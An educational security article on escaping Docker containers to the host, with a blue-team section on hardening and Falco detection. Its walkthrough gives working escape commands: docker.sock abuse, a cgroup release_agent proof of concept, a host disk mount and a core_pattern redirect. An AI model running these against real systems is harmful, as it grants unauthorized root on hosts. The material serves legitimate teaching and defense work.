Disclaimer: This article is for education and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Container escape on production infrastructure without authorization is illegal and unethical.
Introduction / Overview
Containers are often mistaken for security boundaries. They are not. A container is a Linux process with namespaces, cgroups, and capability restrictions wrapped around it — all of which share the host kernel. When a workload is misconfigured (or an attacker chains a kernel bug), that "boundary" dissolves and you land on the host as root.
In this article you'll learn the most reliable, real-world container escape primitives: the privileged container, abusing a host mount, the classic cgroups release_agent trick, leaking host context through /proc, and what CAP_SYS_ADMIN actually unlocks. We'll walk through a reproducible lab, then give the blue team equal time with concrete detection and hardening guidance.
How it works / Background
A container's isolation comes from three kernel features:
- Namespaces (pid, net, mnt, uts, ipc, user) give the process a private view of system resources.
- cgroups limit and account for resource usage (CPU, memory, devices).
- Capabilities slice root's powers into ~40 distinct bits. A default Docker container drops dangerous ones like CAP_SYS_ADMIN and CAP_SYS_MODULE.
Escape happens when one of these guardrails is removed or abused:
- --privileged strips nearly all of them: full capability set, no seccomp/AppArmor confinement, and host devices appear under /dev. The namespaces remain, but they no longer contain much.
- A host directory bind-mounted into the container (e.g. -v /:/host or a mounted Docker socket) hands you the filesystem directly.
- CAP_SYS_ADMIN lets you call mount(2), manipulate cgroups, and set up the release_agent escape.
- /proc exposes host-level knobs like /proc/sys/kernel/core_pattern and host PIDs when the PID namespace is shared.
Prerequisites / Lab setup
You need a Linux host with Docker and root inside the test container. Spin up a deliberately weak target:
# Privileged container (worst case)
docker run --rm -it --privileged --name escape-lab ubuntu:22.04 bash
# Or: capability-only target
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined \
ubuntu:22.04 bash
Inside the container, confirm what you're working with:
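# What capabilities do we have? (capsh ships in libcap2-bin; install it if missing)
capsh --print | grep sys_admin
# Are we privileged? Check device access.
ls -la /dev | head
# Read the effective capability set
grep CapEff /proc/self/status
# CapEff: 000001ffffffffff -> full set == privileged
capsh --decode=000001ffffffffff confirms the effective set. A value of 000001ffffffffff means every capability is present on kernels 5.9 and later (41 capabilities). Older kernels define fewer capabilities, so their full mask is shorter, for example 0000003fffffffff.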
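Reading a CapEff mask by eye is error-prone, so a small helper that tests individual bits can help. The sketch below assumes the capability numbers from linux/capability.h (CAP_SYS_MODULE = 16, CAP_SYS_ADMIN = 21). has_cap and report_sys_admin are hypothetical helper names, not part of any existing tool.

```shell
#!/bin/sh
# has_cap MASK BIT: succeed if capability number BIT is set in hex MASK.
# MASK is the hex string from the CapEff line, without a 0x prefix.
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# Capability numbers as defined in linux/capability.h.
CAP_SYS_MODULE=16
CAP_SYS_ADMIN=21

# report_sys_admin MASK: print whether CAP_SYS_ADMIN is set in MASK.
report_sys_admin() {
    if has_cap "$1" "$CAP_SYS_ADMIN"; then
        echo "CAP_SYS_ADMIN present"
    else
        echo "CAP_SYS_ADMIN absent"
    fi
}
```

Inside the lab container it could be called as report_sys_admin "$(awk '/^CapEff/ {print $2}' /proc/self/status)". A container started with Docker's default capability set typically reports 00000000a80425fb, which has neither bit set.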
Attack walkthrough / PoC
1. The mounted Docker socket
The single most common finding. If /var/run/docker.sock is mounted into the container, you control the host's Docker daemon and can launch a new privileged container that mounts the host root:
# Detect it
ls -la /var/run/docker.sock
# If the docker CLI is present:
docker run -v /:/host --rm -it alpine chroot /host sh
# You are now root on the host filesystem.
2. cgroups release_agent escape (needs CAP_SYS_ADMIN)
The classic notify_on_release / release_agent technique. With CAP_SYS_ADMIN you can mount an RDMA/memory cgroup, set a host-side release_agent, and have the kernel execute it as root on the host when the last task leaves the cgroup.
# Mount a cgroup controller we control
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Enable release notification
echo 1 > /tmp/cgrp/x/notify_on_release
# Find the container's path on the host via the overlay mount
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
# Point release_agent at a script on the HOST filesystem
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Drop the payload (unquoted EOF so $host_path expands now; it is unset when the host runs the script)
cat > /cmd <<EOF
#!/bin/sh
ps aux > "$host_path/output"
EOF
chmod a+x /cmd
# Trigger: spawn a process that immediately exits the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Host-side output now contains host process list
cat /output
Note: this technique works on cgroup v1. Many modern distros default to cgroup v2 (unified hierarchy), which has no release_agent file, so the technique does not carry over as-is. That is a useful detail when scoping an engagement.
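When scoping or auditing, it helps to know which cgroup version a host or container actually exposes. The sketch below classifies it from a mount table in /proc/mounts format. cgroup_mode is a hypothetical helper name, and the classification is deliberately coarse: any mounted v1 controller, including a hybrid setup, is reported as v1 because that is the case where release_agent exists.

```shell
#!/bin/sh
# cgroup_mode [MOUNTS_FILE]: print "v1", "v2", or "unknown".
# MOUNTS_FILE defaults to /proc/mounts and uses its format:
#   device mountpoint fstype options dump pass
cgroup_mode() {
    awk '
        $2 == "/sys/fs/cgroup" && $3 == "cgroup2" { v2 = 1 }
        $3 == "cgroup"                            { v1 = 1 }
        END {
            if (v1)      print "v1"       # at least one v1 hierarchy is mounted
            else if (v2) print "v2"       # unified hierarchy only
            else         print "unknown"  # no cgroup mount visible
        }
    ' "${1:-/proc/mounts}"
}
```

Calling cgroup_mode with no argument reads the live mount table. A result of v2 suggests the release_agent path above is not applicable on that system.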
3. core_pattern via /proc (needs CAP_SYS_ADMIN and a writable /proc/sys)
/proc/sys/kernel/core_pattern is a host-global setting. If writable, you redirect crash handling to a binary that runs as root on the host:
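# The handler path is resolved in the host's mount namespace, so it must point at a file the host can see.
# The path below is a placeholder.
echo "|/proc/sys/kernel/core_pattern_handler %P" > /proc/sys/kernel/core_pattern
# Then trigger a segfault in a process to invoke the handler.
4. Privileged: mount the host disk directly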
With --privileged, host block devices are visible. Just mount the root partition:
fdisk -l # enumerate host disks
mkdir /mnt/host
mount /dev/sda1 /mnt/host # or the relevant root partition
chroot /mnt/host # full host root shell
5. Known CVEs worth remembering
- CVE-2019-5736: overwriting the host runc binary from inside a container, leading to root on the host.
- CVE-2022-0492: cgroups v1 release_agent escape achievable from an unprivileged container in certain configs because the capability check was missing.
- CVE-2024-21626: runc file-descriptor leak (WORKDIR / leaked fd) enabling escape during docker build/run.
Figure: four escape paths (Docker socket, privileged disk mount, CAP_SYS_ADMIN abuse, and runc CVEs) all converge on root code execution on the host.
Detection & Defense (Blue Team)
Defense matters as much as the attack. Apply these in layers.
1. Never run --privileged; drop capabilities by default.
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE \
--security-opt no-new-privileges \
--read-only myimage
In Kubernetes, enforce this with Pod Security Standards (restricted) or an admission controller:
securityContext:
  privileged: false
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]
2. Never mount the Docker socket into a workload. If a build system needs Docker, use rootless mode, Kaniko, or BuildKit instead.
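To verify that no workload has the socket, a check can run inside each container and inspect its mount table. The sketch below parses the /proc/self/mountinfo format, where field 4 is the mount's root within its filesystem and field 5 is the mount point. find_docker_sock is a hypothetical helper name, and the match is by file name only, so a socket that was renamed on the host before mounting would be missed.

```shell
#!/bin/sh
# find_docker_sock [MOUNTINFO_FILE]: print every mount point whose source
# or target path ends in "docker.sock".
# Exit status is 0 when at least one is found, 1 otherwise.
find_docker_sock() {
    awk '
        $4 ~ /docker\.sock$/ || $5 ~ /docker\.sock$/ { print $5; found = 1 }
        END { exit (found ? 0 : 1) }
    ' "${1:-/proc/self/mountinfo}"
}
```

In a CI gate or a startup probe, something like find_docker_sock && echo "docker.sock is mounted" >&2 would surface the finding without depending on the docker CLI being installed.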
3. Keep seccomp and AppArmor/SELinux enabled. Docker's default seccomp profile blocks mount(2) unless CAP_SYS_ADMIN is granted, along with namespace-manipulation calls such as unshare(2) and setns(2) and many other escape-relevant syscalls. --security-opt apparmor=unconfined and --security-opt seccomp=unconfined should be treated as red flags in audits.
4. Use user namespaces / rootless containers so in-container root maps to an unprivileged host UID.
5. Patch runc, containerd, and the kernel — CVE-2019-5736 and CVE-2024-21626 were both fixed in runc; pin minimum versions.
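Pinning a minimum version can be automated with a small comparison. The sketch below assumes GNU sort with -V (version sort) is available and uses 1.1.12, the runc release that fixed CVE-2024-21626, as the floor. version_ge, check_runc, and RUNC_MIN are hypothetical names. Pre-release strings such as 1.0.0-rc6 may not order the way you expect under sort -V, so treat those results with care.

```shell
#!/bin/sh
# version_ge ACTUAL MINIMUM: succeed if ACTUAL >= MINIMUM.
# The smaller of the two versions sorts first; if that is MINIMUM,
# ACTUAL is at least as new.
version_ge() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$2" ]
}

# Minimum acceptable runc version (the release that fixed CVE-2024-21626).
RUNC_MIN="1.1.12"

# check_runc ACTUAL: report whether ACTUAL meets the pinned minimum.
check_runc() {
    if version_ge "$1" "$RUNC_MIN"; then
        echo "ok: runc $1 >= $RUNC_MIN"
    else
        echo "outdated: runc $1 < $RUNC_MIN"
    fi
}
```

On a host, the installed version could be fed in with check_runc "$(runc --version | awk 'NR==1 {print $3}')", assuming the first line of the output has the form "runc version X.Y.Z".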
6. Detection at runtime. Deploy Falco with rules that fire on escape behavior:
- rule: Detect release_agent File Container Escapes
  desc: Detect writes to a cgroup release_agent file
  condition: open_write and fd.name endswith release_agent
  output: "Possible cgroup escape (file=%fd.name proc=%proc.cmdline)"
  priority: CRITICAL
Falco's default ruleset already flags "Launch Privileged Container", "Mount Launched in Privileged Container", and writes to sensitive /proc paths. Pair this with auditd watches on core_pattern and release_agent, and scan images/configs in CI with kube-bench and trivy config.
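Alongside event-based rules, a periodic drift check on core_pattern is cheap to run. The sketch below compares the current value against a baseline you recorded earlier and flags the case where dumps are now piped to a program. core_pattern_status is a hypothetical helper name. Many distributions legitimately ship a piped handler, which is why the comparison is against a baseline rather than a fixed value.

```shell
#!/bin/sh
# core_pattern_status EXPECTED ACTUAL: classify the current core_pattern.
#   "ok"       ACTUAL matches the recorded baseline
#   "piped"    ACTUAL differs and pipes dumps to a program (leading "|")
#   "changed"  ACTUAL differs but is a plain file pattern
core_pattern_status() {
    if [ "$2" = "$1" ]; then
        echo "ok"
    else
        case "$2" in
            "|"*) echo "piped" ;;
            *)    echo "changed" ;;
        esac
    fi
}
```

A cron job or agent could call core_pattern_status "$BASELINE" "$(cat /proc/sys/kernel/core_pattern)" and alert on anything other than ok, where BASELINE is whatever value you captured at provisioning time.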
7. Audit for the markers an attacker looks for: mounted docker.sock, hostPath volumes, hostPID: true, and CAP_SYS_ADMIN. These map to MITRE ATT&CK T1611 — Escape to Host.
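The markers listed above can be caught with a quick text scan before heavier tooling runs. The sketch below is a naive grep over a Kubernetes manifest, not a YAML parser, so it can produce false positives (for example a comment mentioning docker.sock) and will miss settings injected by templating. audit_manifest is a hypothetical helper name.

```shell
#!/bin/sh
# audit_manifest FILE: print "line:text" for each risky setting found.
# Exit status is 0 when at least one marker matches, 1 when none do.
audit_manifest() {
    grep -nE 'privileged:[[:space:]]*true|hostPID:[[:space:]]*true|hostPath:|docker\.sock|SYS_ADMIN' "$1"
}
```

In CI this might be used as audit_manifest deploy.yaml && exit 1 to fail the pipeline on any hit, where deploy.yaml stands in for your manifest path. Dedicated scanners such as trivy config remain the more reliable option.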
For related lateral movement and privilege concepts, see Linux privilege escalation techniques, Kubernetes RBAC abuse, and Docker security hardening.
Conclusion
Container escape is almost always a configuration problem, not a kernel-bug problem. The four primitives (privileged mode, host mounts, especially docker.sock, CAP_SYS_ADMIN-driven cgroups and /proc abuse, and unpatched runc) account for the overwhelming majority of real-world breakouts. As an attacker, enumerate capabilities and mounts first. As a defender, drop capabilities, forbid the socket, keep seccomp/AppArmor on, patch runc, and watch for the escape signatures with Falco. Treat the container as one layer of defense, never the only one.
References
- MITRE ATT&CK — T1611 Escape to Host: https://attack.mitre.org/techniques/T1611/
- HackTricks — Docker Breakout / Privilege Escalation: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security
- CVE-2019-5736 (runc): https://nvd.nist.gov/vuln/detail/CVE-2019-5736
- CVE-2022-0492 (cgroups release_agent): https://nvd.nist.gov/vuln/detail/CVE-2022-0492
- CVE-2024-21626 (runc fd leak): https://nvd.nist.gov/vuln/detail/CVE-2024-21626
- Falco rules: https://github.com/falcosecurity/rules
- NIST SP 800-190, Application Container Security Guide: https://csrc.nist.gov/pubs/sp/800/190/final


